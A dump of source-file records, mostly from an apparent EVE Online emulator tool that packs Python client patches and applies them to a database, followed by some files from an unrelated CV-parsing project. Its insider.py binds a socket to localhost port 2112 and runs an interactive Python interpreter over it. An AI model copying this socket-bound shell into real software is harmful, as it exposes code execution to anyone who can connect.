"text": "#@liveupdate(\"globalClassMethod\", \"uicls.CharacterCreationLayer::CharacterCreationLayer\", \"AskForPortraitConfirmation\")\n#@patchinfo(\"AskForPortraitConfirmation\", \"Patch to fix photo uploads on char creation\")\ndef AskForPortraitConfirmation(self, *args):\n photo = self.GetActivePortrait()\n snapPath = self.GetPortraitSnapshotPath(self.activePortraitIndex)\n photoFile = open(snapPath, \"rb\")\n photoData = photoFile.read()\n photoFile.close()\n eve.Message('CustomNotify', {'notify': 'Uploading your character portrait to EVEMu'})\n result = sm.RemoteSvc(\"photoUploadSvc\").Upload(photoData)\n if ((result is None) or (result == False)):\n eve.Message('CustomNotify', {'notify': 'Portrait upload failed!'})\n else:\n eve.Message('CustomNotify', {'notify': 'Portrait upload successful!'})\n return True\n"
},
{
"alpha_fraction": 0.6962617039680481,
"alphanum_fraction": 0.6985981464385986,
"avg_line_length": 52.5,
"blob_id": "55232c841fd92111718d9275cd23189591a98be3",
"content_id": "19c550135d3f9575bb5f9b542e6cfc535164bd3b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 428,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 8,
"path": "/patches/EVEMuDisableTutorial.py",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#@liveupdate(\"globalClassMethod\", \"svc.tutorial::TutorialSvc\", \"GetTutorials\")\n#@patchinfo(\"GetTutorials\", \"Disable tutorials whenever accessed. They cause issues\")\ndef GetTutorials(self):\n import __builtin__\n eve.Message(\"CustomNotify\", {\"notify\": \"Disabling tutorials\"})\n __builtin__.settings.Get(\"char\").Set(\"ui\", \"showTutorials\", 0)\n eve.Message(\"CustomNotify\", {\"notify\": \"Tutorials disabled!\"})\n return {}\n"
},
{
"alpha_fraction": 0.5893508195877075,
"alphanum_fraction": 0.6039387583732605,
"avg_line_length": 20.421875,
"blob_id": "a104005634bcb6ad6bfc98c0d19d6673c1119fee",
"content_id": "44e21d13d97b5f68624ea46cd07d6c176a61bdf0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1371,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 64,
"path": "/src/patch.h",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#ifndef __PATCH_H__\n#define __PATCH_H__\n\n#include <Python.h>\n\n#include <vector>\n#include <uchar.h>\n\n#define LIVEUPDATEMAGIC \"$lu1\"\n\n// Structure for passing patch info between calls\nstruct Patch {\n uint32_t class_name_size;\n uint32_t method_name_size;\n uint32_t func_name_size;\n uint32_t type_size;\n uint32_t name_size;\n uint32_t desc_size;\n uint32_t bytecode_size;\n\n char *class_name;\n char *method_name;\n char *func_name;\n char *type;\n char *name;\n char *desc;\n char *data;\n char *bytecode;\n};\n\nstruct PatchFile {\n char magic[4];\n uint32_t patch_count;\n Patch *patches;\n};\n\n// LoadPatches will load all patches from a given directory\nstd::vector<Patch *> LoadPatches(const char *patch_dir);\n\nenum PatchError_ {\n __patch_null,\n patch_ok,\n patch_invalid_magic,\n patch_file_too_small,\n patch_file_error,\n};\n\nstruct PatchError {\n uint32_t line;\n PatchError_ err;\n};\n\n#define MAKE_PATCH_ERROR(__error) { \\\n PatchError e; \\\n e.line = __LINE__; \\\n e.err = __error; \\\n return e; \\\n }\n\nconst char *PatchErrorString(PatchError p);\nPatchError DumpRawPatchFile(std::vector<Patch *> patches, const char *filename);\nPatchError LoadRawPatchFile(PatchFile *pf, const char *filename);\n\n#endif\n"
},
{
"alpha_fraction": 0.7696374654769897,
"alphanum_fraction": 0.7711480259895325,
"avg_line_length": 43.150001525878906,
"blob_id": "a96e3fd3f3e4313a6fd644bb7fcc2cd7891b39a4",
"content_id": "f8607218cd5da76a1708c94e5be0ef5aaf2db484",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 2648,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 60,
"path": "/cmake/FindMariaDBClient.cmake",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "# MIT License\n#\n# Copyright (c) 2018 The ViaDuck Project\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n\n# - Try to find MariaDB client library. This matches both the \"old\" client library and the new C connector.\n# Once found this will define\n# MariaDBClient_FOUND - System has MariaDB client library\n# MariaDBClient_INCLUDE_DIRS - The MariaDB client library include directories\n# MariaDBClient_LIBRARIES - The MariaDB client library\n\n# includes\nfind_path(MariaDBClient_INCLUDE_DIR\n NAMES mysql.h\n PATH_SUFFIXES mariadb mysql\n )\n\n# library\nset(BAK_CMAKE_FIND_LIBRARY_SUFFIXES ${CMAKE_FIND_LIBRARY_SUFFIXES})\nset(CMAKE_FIND_LIBRARY_SUFFIXES ${CMAKE_SHARED_LIBRARY_SUFFIX})\nfind_library(MariaDBClient_LIBRARY\n NAMES mariadb libmariadb mariadbclient libmariadbclient mysqlclient libmysqlclient\n PATH_SUFFIXES mariadb mysql\n )\nset(CMAKE_FIND_LIBRARY_SUFFIXES ${BAK_CMAKE_FIND_LIBRARY_SUFFIXES})\n\ninclude(FindPackageHandleStandardArgs)\nfind_package_handle_standard_args(MariaDBClient DEFAULT_MSG MariaDBClient_LIBRARY MariaDBClient_INCLUDE_DIR)\n\nif(MariaDBClient_FOUND)\n if(NOT TARGET MariaDBClient::MariaDBClient)\n add_library(MariaDBClient::MariaDBClient UNKNOWN IMPORTED)\n set_target_properties(MariaDBClient::MariaDBClient PROPERTIES\n INTERFACE_INCLUDE_DIRECTORIES \"${MariaDBClient_INCLUDE_DIR}\"\n IMPORTED_LOCATION \"${MariaDBClient_LIBRARY}\")\n endif()\nendif()\n\nmark_as_advanced(MariaDBClient_INCLUDE_DIR MariaDBClient_LIBRARY)\n\nset(MariaDBClient_LIBRARIES ${MariaDBClient_LIBRARY})\nset(MariaDBClient_INCLUDE_DIRS ${MariaDBClient_INCLUDE_DIR})"
},
{
"alpha_fraction": 0.699999988079071,
"alphanum_fraction": 0.699999988079071,
"avg_line_length": 19,
"blob_id": "49788c55028c64910732d19957f9d5d364e5013b",
"content_id": "acdce5c0182d9e89ed3f1d55a5e794b7bd11d0a2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 200,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 10,
"path": "/src/db.h",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#ifndef __DB_H__\n#define __DB_H__\n\n#include \"patch.h\"\n\nbool DBInit(const char *username, const char *password, const char *db);\nbool DBApplyPatch(Patch *p, int id);\nbool DBCleanLiveupdates();\n\n#endif\n"
},
{
"alpha_fraction": 0.45818954706192017,
"alphanum_fraction": 0.46615344285964966,
"avg_line_length": 28.66141700744629,
"blob_id": "85e18a37d6f6c7c834b4baafc4741d25252a7db3",
"content_id": "2976760bfa8ee1af084f1c66a3367f33ac91de04",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3767,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 127,
"path": "/src/main.cpp",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#include <Python.h>\n#include <stdbool.h>\n#include <stdio.h>\n#include <string.h>\n\n#include \"patch.h\"\n#include \"devtools.h\"\n//#include \"config.h\"\n#define PACKAGE \"evegen\"\n#define PACKAGE_VERSION \"1.0\"\n#include \"db.h\"\n\nbool do_devtools = false;\nbool do_patch = false;\nbool do_test = false;\nbool do_raw = false;\n\nchar *username = NULL;\nchar *password = NULL;\nchar *db = NULL;\nchar *devtools_in = NULL;\n\nstatic void print_help() {\n printf(\"%s - %s\\n\", PACKAGE, PACKAGE_VERSION);\n printf(\" -dev : outputs devtools.raw\\n\");\n printf(\" : optionally supply <devtools file>\\n\");\n printf(\" -patch: applies patches instead of doing a dry run\\n\");\n printf(\" : supply <username> <password> <db>\\n\");\n}\n\nint main(int argc, char **argv) {\n if (argc == 1) {\n print_help();\n return 0;\n }\n for (int i = 0; i < argc; i++) {\n if (strcmp(argv[i], \"-dev\") == 0) {\n if (argc > i + 1) {\n char *devtools_name = argv[i + 1];\n if (*devtools_name != '-') {\n devtools_in = argv[i + 1];\n }\n }\n do_devtools = true;\n }\n if (strcmp(argv[i], \"-test\") == 0) {\n do_test = true;\n }\n if (strcmp(argv[i], \"-patch\") == 0) {\n if (argc < i + 3) {\n printf(\"-patch expects <username> <password> <db>\\n\");\n return 0;\n } else {\n username = argv[i + 1];\n password = argv[i + 2];\n db = argv[i + 3];\n }\n do_patch = true;\n }\n if (strcmp(argv[i], \"-raw\") == 0) {\n do_raw = true;\n }\n if (strcmp(argv[i], \"--help\") == 0 ||\n strcmp(argv[i], \"-h\") == 0) {\n print_help();\n return 0;\n }\n }\n\n Py_Initialize();\n if (do_test) {\n std::vector<Patch *> patches = LoadPatches(\"patches\");\n PatchFile pf;\n \n PatchError err = LoadRawPatchFile(&pf, \"updates.lu\");\n if (err.err != patch_ok) {\n printf(\"ERROR :%s\\n\", PatchErrorString(err));\n printf(\"%d\\n\", err.line);\n return 0;\n }\n for (uint32_t i = 0; i < pf.patch_count; i++) {\n printf(\"===================\\n\");\n Patch *p = &pf.patches[i];\n printf(\"class: %s\\n\", p->class_name);\n printf(\"method: %s\\n\", p->method_name);\n printf(\"func: %s\\n\", p->func_name);\n printf(\"type: %s\\n\", p->type);\n printf(\"name: %s\\n\", p->name);\n printf(\"desc: %s\\n\", p->desc);\n printf(\"bytecode size: %u\\n\", p->bytecode_size);\n }\n }\n\n if (do_patch) {\n std::vector<Patch *> patches = LoadPatches(\"patches\");\n printf(\" OK | Loaded %lu patches\\n\", patches.size());\n DBInit(username, password, db);\n DBCleanLiveupdates();\n printf(\" > Applying patches\\n\");\n for (uint32_t i = 0; i < patches.size(); i++) {\n Patch *p = patches[i];\n printf(\" %d/%lu: %s\\n\", i + 1, patches.size(), p->name);\n DBApplyPatch(p, i);\n }\n }\n\n if (do_raw) {\n std::vector<Patch *> patches = LoadPatches(\"patches\");\n PatchError err = DumpRawPatchFile(patches, \"updates.lu\");\n if (err.err != patch_ok) {\n printf(\"Error dumping patch file: %s\\n\", PatchErrorString(err));\n printf(\"At line %u\\n\", err.line);\n return -1;\n }\n printf(\" OK | Dumped %lu types to updates.lu\\n\", patches.size());\n }\n\n if (do_devtools) {\n if (devtools_in != NULL) {\n MakeDevtools(devtools_in);\n } else {\n MakeDevtools(\"devtools.py\");\n }\n }\n\n return 0;\n}\n"
},
{
"alpha_fraction": 0.6123127937316895,
"alphanum_fraction": 0.6139767169952393,
"avg_line_length": 25.711111068725586,
"blob_id": "c8eeef1abb5af4b3b6824bd3b49f4213cbf38984",
"content_id": "07c5eca2d21f7e3709c276fc2a08deddef893b16",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1202,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 45,
"path": "/src/devtools.cpp",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#include \"devtools.h\"\n\n#include <stdio.h>\n\n#include \"makedevtools.def\"\n\n// WIP may never finish\nbool MakeDevtoolsNoScript(const char *devtools_file) {\n /*\n //PyObject *main = PyImport_AddModule(\"__main__\");\n \n PyObject *globals = PyDict_New();\n PyObject *locals = PyDict_New();\n FILE *f = fopen(devtools_file, \"r\");\n if (f == NULL) {\n printf(\" ERROR | Couldn't find devtools file\\n\");\n return false;\n }\n\n PyRun_FileExFlags(f, devtools_file, Py_file_input,\n globals, locals, true, NULL);\n\n\n PyObject *bootstrap = PyDict_GetItemString(locals, \"Bootstrap\");\n PyObject *func_code = PyObject_GetAttrString(bootstrap, \"func_code\");\n PyObject *co_consts_tuple = PyObject_GetAttrString(func_code, \"co_consts\");\n\n Py_ssize_t size = PyTuple_Size(co_consts_tuple);\n size = 0;\n //PyObject *co_consts = PyList_New(size);\n */\n\n return true;\n}\n\nbool MakeDevtools(const char *devtools_file) {\n int ret = PyRun_SimpleString(devtools_script);\n if (ret == 0) {\n printf(\" OK | Wrote devtools.raw\\n\");\n return true;\n } else {\n printf(\" ERROR | Couldn't write devtools.raw\\n\");\n return false;\n }\n}\n"
},
{
"alpha_fraction": 0.71517413854599,
"alphanum_fraction": 0.7238805890083313,
"avg_line_length": 27.714284896850586,
"blob_id": "e066be3b9ae150be7138ee7dca8ee9c07fb9dd10",
"content_id": "b0010240673895ef474aaff616ef3905ab00e66b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 804,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 28,
"path": "/CMakeLists.txt",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 3.16)\nproject(evegen)\n\nset(CMAKE_CXX_STANDARD 14)\n\ninclude(\"cmake/FindMariaDBClient.cmake\")\n\ninclude_directories(src)\n\nfind_package(Python 2.7 COMPONENTS Development REQUIRED)\n\nadd_executable(evegen\n src/db.cpp\n src/db.h\n src/devtools.cpp\n src/devtools.h\n src/main.cpp\n src/patch.cpp\n src/patch.h\n src/stb_c_lexer.h)\n\ntarget_include_directories(evegen PRIVATE ${Python_INCLUDE_DIRS} ${MariaDBClient_INCLUDE_DIR})\ntarget_link_libraries(evegen ${Python_LIBRARIES} ${MariaDBClient_LIBRARIES})\n\nif (EXISTS \"${Python_INCLUDE_DIRS}/Stackless\")\n message(STATUS \"Stackless Python installation detected, making include corrections\")\n target_include_directories(evegen PRIVATE \"${Python_INCLUDE_DIRS}/Stackless\")\nendif()\n"
},
{
"alpha_fraction": 0.5186255574226379,
"alphanum_fraction": 0.5285806059837341,
"avg_line_length": 26.307018280029297,
"blob_id": "f9b12b2b13d083965c7f267ef5942c028a1f3b05",
"content_id": "0d60a609476475c009511a8d3b4375f120cbc5df",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3114,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 114,
"path": "/insider.py",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "import service\nimport marshal\nimport types\nimport log\nimport socket\nimport stackless\nimport code\nimport sys\n\n# Thanks to t0st for the console code \\0/\n# TODO: Nick Pull remote console into it's own service.\n\nclass insider(service.Service):\n __guid__ = 'svc.insider'\n __displayname__ = 'Evemu Insider Service'\n __notifyevents__ = ['OnSessionChanged']\n\n # socket wrapper\n class probe_sw():\n def __init__(self, s):\n self.s = s\n def read(self, len):\n return self.s.recv(len)\n def write(self, str):\n return self.s.send(str)\n def readline(self):\n return self.read(256) # lazy implementation for quick testing\n \n def __init__(self):\n service.Service.__init__(self)\n \n def OnSessionChanged(self, isRemote, sess, change):\n self.LogInfo('On Session Change In Insider')\n \n def Show(self, argOne, argTwo):\n self.LogInfo('Insider Show Was Called')\n import form\n form.DevWindow.Open()\n sm.GetService(\"registry\").GetWindow(\"devwindow\").Minimize()\n\n def start_remote_console(self):\n import socket\n import stackless\n self.LogInfo(\"Starting remote console on port 2112\")\n # listening socket\n self.s = socket.socket()\n self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.s.bind(('127.0.0.1', 2112))\n self.s.listen(3)\n \n # k, go!\n #stackless.tasklet(probe_accept)(probe_sock)\n #stackless.run()\n \n #self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n stackless.tasklet(self.probe_accept)()\n\n def probe_accept(self):\n import socket\n import stackless\n import code\n import sys\n while True:\n c, a = self.s.accept()\n c = self.probe_sw(c)\n \n sys.stdin = c\n sys.stdout = c\n sys.stderr = c\n \n # should break if connection is dropped\n try:\n code.interact()\n except:\n pass\n \n # I wanted to kill the socket on clean exit()\n # but it doesn't seem to work?\n try:\n c.s.shutdown(SHUT_RDWR)\n c.s.close()\n except:\n pass\n \n # restore original stds\n sys.stdin = sys.__stdin__\n sys.stdout = sys.__stdout__\n sys.stderr = sys.__stderr__\n \n stackless.schedule()\n\n def probe_connect(self):\n import socket\n import stackless\n import code\n import sys\n\n self.s.connect((\"127.0.0.1\", 2112))\n c = self.probe_sw(self.s)\n\n sys.stdin = c\n sys.stdout = c\n sys.stderr = c\n # should break if connection is dropped\n try:\n code.interact()\n except:\n pass\n # restore original stds\n sys.stdin = sys.__stdin__\n sys.stdout = sys.__stdout__\n sys.stderr = sys.__stderr__\n\n stackless.schedule()\n\n"
}
] | 21 |
vijaynathari/remoteclazz-emr
|
https://github.com/vijaynathari/remoteclazz-emr
|
1ae2a5fc856e68e5088a9d2d6144629f412ebf75
|
faa90c93d2378da177a11a43d6072725f69f5880
|
b770a99525019fbc269188c687efc81027d14fdd
|
refs/heads/main
| 2023-08-14T23:09:16.101889 | 2021-09-27T06:01:46 | 2021-09-27T06:01:46 | 410,755,727 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6880828738212585,
"alphanum_fraction": 0.6943005323410034,
"avg_line_length": 37.63999938964844,
"blob_id": "28fa2753f01b4af12c21d0af7cb151a50d92a855",
"content_id": "bcde108c92723f9e5b96dc36f7d34e4d579e784c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 965,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 25,
"path": "/script/pyspark_violations.py",
"repo_name": "vijaynathari/remoteclazz-emr",
"src_encoding": "UTF-8",
"text": "import sys\nfrom operator import add\nfrom pyspark.sql import SparkSession\n\nif __name__ == \"__main__\":\n # Create Spark session\n spark = SparkSession.builder.appName(\"Calculate Red Health Violations\").getOrCreate()\n\n # Load the restaurant violation CSV data\n restaurants_df = spark.read.option(\"header\", \"true\").csv(sys.argv[1])\n\n # Create an in-memory DataFrame to query\n restaurants_df.createOrReplaceTempView(\"restaurant_violations\")\n\n # Create a DataFrame of the top 10 restaurants with the most Red violations\n top_red_violation_restaurants = spark.sql(\"SELECT name, count(*) AS total_red_violations \" +\n \"FROM restaurant_violations \" +\n \"WHERE violation_type = 'RED' \" +\n \"GROUP BY name \" +\n \"ORDER BY total_red_violations DESC LIMIT 10 \")\n\n # Write the results to the specified output URI\n top_red_violation_restaurants.write.option(\"header\", \"true\").mode(\"overwrite\").csv(sys.argv[2])\n\n spark.stop()"
},
{
"alpha_fraction": 0.6202090382575989,
"alphanum_fraction": 0.6376306414604187,
"avg_line_length": 21.153846740722656,
"blob_id": "b25cd812442a8d92514978c7ca19fa9718df36c6",
"content_id": "7893aa30ae47848b18f6b7b92a5c898b505c3779",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 287,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 13,
"path": "/Lambda/LambdaCode.py",
"repo_name": "vijaynathari/remoteclazz-emr",
"src_encoding": "UTF-8",
"text": "import json\nimport boto3\n\ndef lambda_handler(event, context):\n glue=boto3.client('glue')\n \n # give your crwler name here\n glue.start_crawler(Name='remoteclazz-emr-crawler')\n \n return {\n 'statusCode': 200,\n 'body': json.dumps('Successfully Executed')\n }"
},
{
"alpha_fraction": 0.8304498195648193,
"alphanum_fraction": 0.8304498195648193,
"avg_line_length": 25.272727966308594,
"blob_id": "d0d047e1acd5b7629ed74717cd6cbce921228b30",
"content_id": "9e4c791dd140eaa8201cb590d434954000e5ce56",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 289,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 11,
"path": "/README.md",
"repo_name": "vijaynathari/remoteclazz-emr",
"src_encoding": "UTF-8",
"text": "# remoteclazz-emr\n\nSpark Script File: script/pyspark_violations.py\n\nInput Data File: input/food_establishment_data.csv\n\nStep Function Definition: Step Function/StepFunctionDefinition.json\n\nStep Function Input: Step Function/StepFunctionInput.json\n\nLambda Script File: Lambda/LambdaCode.py\n"
}
] | 3 |
RoisinNiF/cfggroupproject
|
https://github.com/RoisinNiF/cfggroupproject
|
ccf105dbdad005d7b7bef76ee6c5bd3486825908
|
5ff3c06c0bf5eb8598c8d99a5c1e9593f976ed40
|
b05c867dc6639f8d23562570ab2ef3a17a3251d1
|
refs/heads/master
| 2023-04-09T11:54:22.233064 | 2021-04-15T13:39:35 | 2021-04-15T13:39:35 | 356,021,162 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5748193860054016,
"alphanum_fraction": 0.5804953575134277,
"avg_line_length": 30.225807189941406,
"blob_id": "b0d7d8dcab827bd7f56bbc75e75c6b39bb412d0a",
"content_id": "e1009307d0033455f8ec444549c36688c0661dec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1950,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 62,
"path": "/main.py",
"repo_name": "RoisinNiF/cfggroupproject",
"src_encoding": "UTF-8",
"text": "import csv\n\ndef read_data():\n data = []\n with open('sales.csv', 'r') as sales_csv:\n spreadsheet = csv.DictReader(sales_csv)\n for row in spreadsheet:\n data.append(row)\n return data\ndef run():\n data = read_data()\n sales = []\n for row in data:\n sale = int(row['sales'])\n sales.append(sale)\n total = sum(sales)\n highest_sale = max(sales)\n lowest_sale = min(sales)\n month = []\n for row in data:\n months = str(row['month'])\n month.append(months)\n expenditure = []\n for row in data:\n expense = int(row['expenditure'])\n expenditure.append(expense)\n \n #For loop prints the total sales across each month\n print('Months Sales')\n for months, sale in zip(month, sales): \n print(months,sale)\n \n print('Total sales: €{}'.format(total))\n print('Average sales: €{}'.format((round(total/12, 2))))\n \n #For loops to find the highest and lowest sale months\n for months, sale in zip(month, sales):\n if sale == max(sales):\n print('Highest sale month: {}'.format(months))\n print('Highest sale: €{}'.format(highest_sale))\n for months, sale in zip(month, sales): \n if sale == min(sales):\n print('Lowest sale month: {}'.format(months))\n print('Lowest sale: €{}'.format(lowest_sale))\n \n # Monthly Profit\n yearly_profit = 0\n print('Monthly Profit in €')\n for sale, expense in zip(sales, expenditure):\n monthly_profit = sale - expense\n print(monthly_profit)\n yearly_profit = yearly_profit + monthly_profit\n print('Yearly profit: €{}'.format(yearly_profit))\n \n #Monthly Sale Changes as percentages\n print('Monthly Sale Changes as Percentages (%)')\n i = 0\n for sale in sales:\n percentage_diff=((sales[i+1] - sales[i])/sales[i]) * 100\n print(round(percentage_diff, 2))\n i = i + 1\nrun()\n\n\n"
}
] | 1 |
yjlo123/CViA
|
https://github.com/yjlo123/CViA
|
64a933b1e5773be9c6aa44dafbb429e6a06e82a7
|
8a2b87d5060866df5f399559b960946e9cfb16cc
|
1e9e1a96437f78419bef16f3ad474011e92b2aa6
|
refs/heads/master
| 2020-04-09T17:04:29.756180 | 2015-11-09T19:09:50 | 2015-11-09T19:09:50 | 42,941,260 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4375,
"alphanum_fraction": 0.7124999761581421,
"avg_line_length": 15.199999809265137,
"blob_id": "d03bdab59ae9ba6c62ce189ecb5cb0ceec91d0b8",
"content_id": "0ab95909340035b3e26da97506ffb990d271e690",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 80,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 5,
"path": "/requirements.txt",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "Flask==0.10.1\npython-docx==0.8.5\nlxml==3.4.4\npdfminer==20140328\ntextblob==0.11.0"
},
{
"alpha_fraction": 0.665444552898407,
"alphanum_fraction": 0.6672777533531189,
"avg_line_length": 32.09090805053711,
"blob_id": "d8f3237d47c3bdcf4f44cc49b35194e22dd4cac7",
"content_id": "193557dd0378c0c5fd24a75ddcb92262cad10a8e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1091,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 33,
"path": "/cvConverter/PDFFileConverter.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvConverter.BaseConverter import BaseConverter\nfrom pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter\nfrom pdfminer.converter import TextConverter\nfrom cStringIO import StringIO\nfrom pdfminer.layout import LAParams\nfrom pdfminer.pdfpage import PDFPage\n\n__author__ = 'siwei'\n\nclass PDFFileConverter(BaseConverter):\n\n def __init__(self):\n self.type = \"pdf\"\n\n def convert(self):\n rsrcmgr = PDFResourceManager()\n retstr = StringIO()\n codec = 'utf-8'\n laparams = LAParams()\n device = TextConverter(rsrcmgr, retstr, codec=codec, laparams=laparams)\n fp = file(self.path, 'rb')\n interpreter = PDFPageInterpreter(rsrcmgr, device)\n password = \"\"\n maxpages = 0\n caching = True\n pagenos=set()\n for page in PDFPage.get_pages(fp, pagenos, maxpages=maxpages, password=password,caching=caching, check_extractable=True):\n interpreter.process_page(page)\n fp.close()\n device.close()\n str = retstr.getvalue()\n retstr.close()\n return self.text+str"
},
{
"alpha_fraction": 0.6138842701911926,
"alphanum_fraction": 0.6142148971557617,
"avg_line_length": 28.096153259277344,
"blob_id": "68385e1d59237855a734b5c510305e1fd6bdc713",
"content_id": "a6fa89ef9c545d12c9e8a237a927ee8c9f3baf29",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3025,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 104,
"path": "/Controller.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvConverter import Converter\nfrom cvEvaluator.EduEvaluator import EduEvaluator\nfrom cvEvaluator.ExpEvaluator import ExpEvaluator\nfrom cvEvaluator.LangEvaluator import LangEvaluator\nfrom cvEvaluator.OtherEvaluator import OtherEvaluator\nfrom cvEvaluator.SkillEvaluator import SkillEvaluator\nfrom cvParser.Parser import Parser\nfrom cvEvaluator import Evaluator\nimport pprint\nfrom cvScorer.Scorer import Scorer\n\n__author__ = 'siwei'\n\nclass Controller():\n def __init__(self):\n self.evaluator = Evaluator.Evaluator()\n self.parser = Parser()\n self.converter = Converter.DocConverter()\n self.scorer = Scorer()\n self.cv_list = []\n self.cv_scores = []\n self.setup_evaluators()\n self.job_function = \"\"\n\n def setup_evaluators(self):\n language_evaluator = LangEvaluator()\n skill_evaluator = SkillEvaluator()\n education_evaluator = EduEvaluator()\n experience_evaluator = ExpEvaluator()\n other_evaluator = OtherEvaluator()\n self.evaluator.add(language_evaluator)\n self.evaluator.add(skill_evaluator)\n self.evaluator.add(education_evaluator)\n self.evaluator.add(experience_evaluator)\n self.evaluator.add(other_evaluator)\n\n def clear(self):\n self.cv_list = []\n self.cv_scores = []\n\n def setup_requirement(self, requirement):\n self.evaluator.set_requirement(requirement)\n\n def set_weight(self, weight):\n self.scorer.set_weight(weight)\n\n def set_job_function(self, job_function):\n \"\"\n\n def evaluate(self, cvs):\n self.clear()\n for cv in cvs:\n CV_Text = self.converter.documentToText(cv).decode('unicode_escape').encode('ascii','ignore')\n cvobj = self.parser.convertToObj(CV_Text)\n #pp.pprint(cvobj)\n self.cv_list.append(cvobj)\n\n self.evaluator.set_cv(cvobj)\n self.cv_scores.append(self.evaluator.evaluate())\n\n #x.print_rank()\n\n def get_scores(self):\n return self.scorer.cal_all_score(self.cv_scores)\n\n def get_cv_list(self):\n return self.cv_list\n\n def get_cv_score(self):\n return self.cv_scores\n\n\nif __name__ == \"__main__\":\n requirement = {\n 'education':['bachelor'],\n 'skill': {\n 'must': ['windows','vpn','Web Development'],\n 'good': ['xp','iOS']\n },\n 'language':{\n 'must': ['English'],\n 'good': ['Chinese']\n },\n 'experience':{\n 'must': ['engineer'],\n 'good': []\n },\n 'other':['Google','reading']\n }\n\n cvs = [\n \"cv/LinkedIn/YaminiBhaskar.pdf\",\n \"cv/LinkedIn/DonnabelleEmbodo.pdf\",\n \"cv/LinkedIn/PraveenDeorani.pdf\",\n \"cv/LinkedIn/RussellOng.pdf\",\n \"cv/LinkedIn/YaminiBhaskar.pdf\"]\n\n pp = pprint.PrettyPrinter(indent=4)\n\n ctrl = Controller()\n ctrl.setup_evaluators()\n ctrl.setup_requirement(requirement)\n ctrl.evaluate(cvs)\n pp.pprint(ctrl.get_scores())"
},
{
"alpha_fraction": 0.6367521286010742,
"alphanum_fraction": 0.6410256624221802,
"avg_line_length": 26.58823585510254,
"blob_id": "512db44d9c232b7549480926e49b69416c2d0fa4",
"content_id": "2b5fd29ab52bca6077da6bee900349a433637757",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
